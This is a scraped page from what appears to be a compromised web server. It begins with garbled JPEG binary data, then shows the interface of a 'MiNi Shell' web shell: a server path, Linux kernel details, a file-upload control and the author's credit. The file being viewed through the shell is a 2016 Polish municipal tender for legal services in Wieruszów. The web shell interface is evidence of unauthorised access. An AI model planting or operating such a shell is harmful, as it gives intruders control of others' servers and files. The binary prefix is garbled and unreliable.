JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/160249-N-2016.html

<p class="kh_header"><b>Wieruszów: Kompleksowa obsługa prawna Urzędu Miejskiego w Wieruszowie</b><br>
<b>Numer ogłoszenia: 160249 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Wieruszowa , ul. Rynek 1-7, 98-400 Wieruszów, woj. łódzkie, tel. 62 78 32 610, faks 62 78 32 611, 62 78 32 627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieruszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa prawna Urzędu Miejskiego w Wieruszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:
1. Bieżące udzielanie porad prawnych Zamawiającemu w ilości do 50 zleceń miesięcznie (Zamawiający wskazuje, iż każde zapytanie będzie zawierało opis stanu faktycznego, wraz z odpowiednim przedstawieniem dokumentów opisujących stan faktyczny, stanowisko i  podstawę prawną Zamawiającego dotyczące danego zapytania, zaś porada prawna powinna zawierać co najmniej: analizę stanu faktycznego, stanu prawnego, konkluzję zawierającą prawidłowe, zdaniem opiniującego, rozwiązanie, bądź propozycję rozwiązania problemu formalno-prawnego zgłaszanego przez Zamawiającego) w szczególności w zakresie:
1) zadań samorządu gminnego;
2) szeroko rozumianej działalności Urzędu Miejskiego w Wieruszowie;
3) prawa zamówień publicznych - w szczególności w zakresie tworzenia, opiniowania SIWZ oraz załączników, bieżącego wyjaśniania przepisów w toku postępowania o udzielenie zamówienia publicznego, reprezentacji Zamawiającego w toku postępowań przed Krajową Izbą Odwoławczą;
4) prawa i postępowania cywilnego - w szczególności w zakresie tworzenia, opiniowania lub zawierania umów, asystowania przy zawarciu umowy, jak również doradztwa w zakresie rozwiązania umowy lub dochodzenia roszczeń na etapie przed sądowym, w tym w postępowaniach polubownych, ugodowych, arbitrażowych;
5) prawa oświatowego, sportowego i kultury - w szczególności w zakresie działania szkół, przedszkoli, zespołów szkolno przedszkolnych, zasad wyboru dyrektorów tych jednostek, ich statutów, finansowania i funkcjonowania, procedur ustalania zasad naboru, zasad przekształceń tych jednostek, finansowania i organizacji samorządowych instytucji kultury, ośrodków sportu i rekreacji, etc.;
6) gospodarki nieruchomościami - w szczególności w zakresie ustalania prawa zbywania nieruchomości, wywłaszczeń, nabywania nieruchomości przez Gminę, opłat adiacenckich, nieruchomości przeznaczonych do sprzedaży w drodze przetargowej, zasady gospodarowania mieszkaniowym zasobem gminy, darowizn nieruchomości na rzecz Gminy oraz dziedziczenia przez Gminę, wykonywania prawa odkupu nieruchomości zbytej z zastosowaniem przepisów ustawy o gospodarce nieruchomościami;
7) prawa o drogach publicznych - w szczególności w zakresie prowadzenia inwestycji drogowych oraz nie drogowych, uzyskiwania decyzji o zezwoleniu na realizację inwestycji drogowej, nabywaniu nieruchomości pod drogi publiczne, zawierania umów związanych z realizacją inwestycji nie drogowych, oznakowaniem dróg publicznych, w tym stref płatnego parkowania, bieżącym i zimowym utrzymaniem dróg publicznych;
8) prawa ochrony środowiska - w szczególności w zakresie wydawania opinii i uzgodnień w sprawach realizacji inwestycji budowlanych, decyzji o środowiskowych uwarunkowaniach przedsięwzięć mogących zawsze/potencjalnie oddziaływać na środowisko (w tym np. farm wiatrowych lub fotowoltaicznych, zakładów przemysłowych i przetwórczych, budynków inwentarskich, itp.);
9) prawa budowlanego oraz planowania i zagospodarowania przestrzennego - w szczególności w zakresie wydawania decyzji o ustaleniu warunków zabudowy oraz udziału w procedurze uchwalania studium i miejscowych planów zagospodarowania przestrzennego;
10) finansów publicznych - w szczególności w zakresie opracowywania uchwał budżetowych, wieloletnich planów finansowych, prawidłowości kwalifikacji poszczególnych wydatków budżetowych, odpowiedzialności za naruszenie dyscypliny finansów publicznych;
11)prawa podatkowego - w szczególności w zakresie przygotowywania decyzji w zakresie podatków i opłat lokalnych, przygotowywania opinii lub wniosków o interpretację przepisów prawa podatkowego;
12) prawa pracy i ubezpieczeń społecznych - w tym w zakresie obowiązków pracodawcy wynikających z przepisów ustawy o pracownikach samorządowych, związkach zawodowych, naruszeniu dyscypliny finansów publicznych;
13) prawa autorskiego i prawa własności intelektualnej - w szczególności w zakresie zabezpieczenia interesów Gminy w przypadku nabywania praw do projektów budowlanych, utworów zamawianych przez Gminę, nabywanego oprogramowania, zgłaszania znaków towarowych, itp.;
14) ochrony danych osobowych oraz dostępu do informacji publicznej - w szczególności w zakresie wyznaczania i obowiązków ABI, informowania pracowników i mieszkańców o przetwarzaniu ich danych osobowych, trybu podejmowana czynności przez ABI, zawieraniu umów o powierzenie przetwarzania danych osobowych, weryfikacji obowiązku udostępniania informacji publicznej.
2. Bieżącą obsługę prawną inwestycji infrastrukturalnych realizowanych przez Gminę w okresie obowiązywania Umowy z Wykonawcą (w szczególności bieżące doradztwo na rzecz zespołu prowadzącego projekt) - około 10 inwestycji w ciągu roku polegającą na udzielaniu porad prawnych, opiniowaniu dokumentów lub doradztwie w bieżących sprawach wynikających z realizacji inwestycji.
3. Windykację należności Zamawiającego na etapie przedsądowym polegającą na wysyłaniu wezwań do zapłaty - około 10 wezwań do zapłaty miesięcznie. Koszty znaczków pocztowych pokrywa Zamawiający.
4. Pomoc prawną dla Zamawiającego w przygotowaniu i udzielaniu własnych zamówień publicznych, w tym m.in. pomoc w przygotowaniu specyfikacji istotnych warunków zamówienia, zaproszeń do składania ofert, negocjacji, pism do wykonawców, umów, odpowiedzi na skargi w zależności od potrzeb Zamawiającego - około 15 postępowań w ciągu roku.
5. Doradztwo, opracowanie odpowiedzi na pytania stawiane przez podmioty kontrolujące Zamawiającego oraz opracowywanie zastrzeżeń do wyników kontroli.
6. Doradztwo, opracowanie odpowiedzi na wnioski o udzielenie informacji publicznej.
7. Sporządzanie informacji, opinii i ekspertyz prawnych.
8. Udzielanie wyjaśnień dotyczących interpretacji i stosowania prawa materialnego oraz procedury.
9. Negocjowanie warunków umownych zgodnie z zapotrzebowaniem Zamawiającego.
10. Parafowanie dokumentów zgodnie z zapotrzebowaniem Zamawiającego.
11. Opracowanie pod względem prawnym projektów uchwał kierowanych pod obrady Rady oraz aktów prawnych Burmistrza Wieruszowa w zakresie zastosowania właściwej podstawy prawnej oraz poprawnej redakcji aktu prawnego.
12. Doradzanie wewnętrznym komórkom organizacyjnym Urzędu Miejskiego w Wieruszowie.
13. Udzielanie pracownikom Urzędu wyjaśnień dotyczących interpretacji i stosowania prawa..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 9000,00 zł. (słownie: Dziewięć tysięcy złoty 00/100)
2.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu - wpłata przelewem na konto Zamawiającego 46 1020 4564 0000 5102 0060 0619 PKO BP S.A. o/Wieruszów 
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2014 r.,. poz. 1804 ze zm.).
3.Sposób przekazania: 
Przed upływem terminu składania ofert. 
Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. Dokument potwierdzający wniesie wadium należy dołączyć do oferty.
4.Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia.
Wykonawcy winni udokumentować w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie lub wykonywanie: 
a) minimum jednej usługi polegającej na stałej (w okresie nie krótszym niż 6 miesięcy), bieżącej i kompleksowej obsłudze prawnej Gminy/Urzędu (pomoc, doradztwo). 
b) minimum jednej usługi polegającej na stałej (przez okres nie krótszy niż 6 miesięcy), bieżącej i kompleksowej obsłudze prawnej (pomocy, doradztwie) o wartości nie mniejszej niż 10 000,00 zł brutto miesięcznie,
c) minimum jednej usługi polegającej na świadczeniu dla Zamawiającego (o którym mowa w ustawie Prawo Zamówień Publicznych) pomocy prawnej z zakresu zamówień publicznych o wartości zamówienia przekraczającej 30.000 euro, 
d) minimum jednej usługi polegającej na świadczeniu stałej, kompleksowej pomocy prawnej w zakresie realizacji (budowy, przebudowy) inwestycji liniowych (dróg, kanalizacji, wodociągów, gazociągów, linii energetycznych),
e) minimum jednej usługi polegającej na reprezentacji Zamawiającego (o którym mowa w ustawie Prawo Zamówień Publicznych) w postępowaniu przed Krajową Izbą Odwoławczą, 
f) minimum jednej usługi polegającej na reprezentacji jednostki samorządu terytorialnego przed Wojewódzkim Sądem Administracyjnym lub Naczelnym Sądem Administracyjnym w sprawie skargi na akty prawne organów jednostek samorządu terytorialnego,
g) minimum jednej usługi polegającej na obsłudze prawnej (pomocy, doradztwie) inwestycji polegającej na budowie obiektu budowlanego o wartości nie mniejszej niż 5 milionów złotych,
h) minimum jednej usługi polegającej na wykonaniu pisemnych analiz, ekspertyz lub opinii prawnych dotyczących zagadnień prawnych z zakresu nadzoru nad funkcjonowaniem spółek komunalnych lub kontroli (audytu) inwestycji komunalnych.
Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie dokumentów określonych w Rozdziale VI ust. 1 pkt 2 SIWZ. 
Uwaga: W przypadku, jeżeli załączony wykaz usług wykonanych/wykonywanych będzie potwierdzać wysokość tych usług w walucie innej niż PLN, Wykonawca powinien dokonać przeliczenia na PLN wg średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało zamieszczone na stronie internetowej Zamawiającego i wskazać w wykazie kwotę dokonanego przeliczania. W przypadku, gdy Wykonawca nie dokona powyższego przeliczenia i nie wskaże w wykazie kwoty przeliczenia, Zamawiający dokona przeliczenia na PLN wg średniego kursu NBP na dzień, w którym ogłoszenie o zamówieniu zostało zamieszczone na stronie internetowej Zamawiającego;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda udokumentowania dysponowania odpowiednim potencjałem technicznym:
- z uwagi na przewidywaną możliwość świadczenia usługi w miejscach innych niż siedziba Wykonawcy i siedziba Zamawiającego, każda z osób, o których mowa w lit. b (dysponowanie osobami zdolnymi do wykonania zamówienia) powinna być wyposażona w komputer wyposażony w:
i.legalne oprogramowanie do edycji tekstów kompatybilne z oprogramowaniem Microsoft Word 2010 oraz Microsoft Excell 2010,
ii. legalne oprogramowanie prawnicze typu Lex lub Legalis,
Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie dokumentów określonych w Rozdziale VI ust. 1 pkt 5 SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda udokumentowania dysponowania osobami zdolnymi do wykonania zamówienia: 
- do udziału w postępowaniu uprawnieni są wyłącznie radcy prawni wykonujący zawód w jednej z form wskazanych w art. 8 ustawy z dnia 6 lipca 1982 r. o radcach prawnych (t.j. Dz. U. z 2016 r. poz. 233) lub adwokaci wykonujący zawód w jednej z form wskazanych w art. 4a ustawy z dnia 26 maja 1982 r. Prawo o adwokaturze (t.j. Dz. U. z 2015 r. poz. 615 ze zm.), 
- Wykonawca zatrudnia lub stale współpracuje z co najmniej 4 radcami prawnymi lub adwokatami, przy czym:
i. przynajmniej dwie z ww. osób muszą posiadać doświadczenie zawodowe minimum 10 lat w wykonywaniu usług prawniczych jako radca prawny albo adwokat,
ii. pozostałe osoby muszą posiadać doświadczenie zawodowe minimum 3 lata w wykonywaniu usług prawniczych jako radca prawny albo adwokat.
Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie dokumentów określonych w Rozdziale VI ust. 1 pkt 3 i pkt 4 SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania sytuacji ekonomicznej i finansowej. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
2. Wykonawcy, którzy nie wykażą spełniania warunków udziału w postępowaniu, podlegać będą wykluczeniu z udziału w postępowaniu.
3. Z udziału w niniejszym postępowaniu wyklucza się Wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
4. Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia na zasadzie SPEŁNIA/ NIE SPEŁNIA.
5. Oferta Wykonawcy wykluczonego uznana zostanie za odrzuconą.
6. Zamawiający odrzuci ofertę, jeżeli:
1) jest niezgodna z ustawą Pzp;
2) jej treść nie odpowiada treści SIWZ, z zastrzeżeniem art. 87 ust. 2 pkt 3 ustawy Pzp;
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia;
6) zawiera błędy w obliczeniu ceny;
7) Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp;
8) jest nieważna na podstawie odrębnych przepisów.
7. O wykluczeniu z postępowania oraz o odrzuceniu oferty Wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie uzasadnienie faktyczne i prawne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - doświadczenie zawodowe wykonawcy - 40</li>
<li>3 - Czas reakcji - 10</li>
<li>4 - Potencjał kadrowy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wokiss.pl/wieruszowm/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.wokiss.pl/wieruszowm/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 11:00, miejsce: Urząd Miejski w Wieruszowie, ul. Rynek 1-7, 98-400 Wieruszów, Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com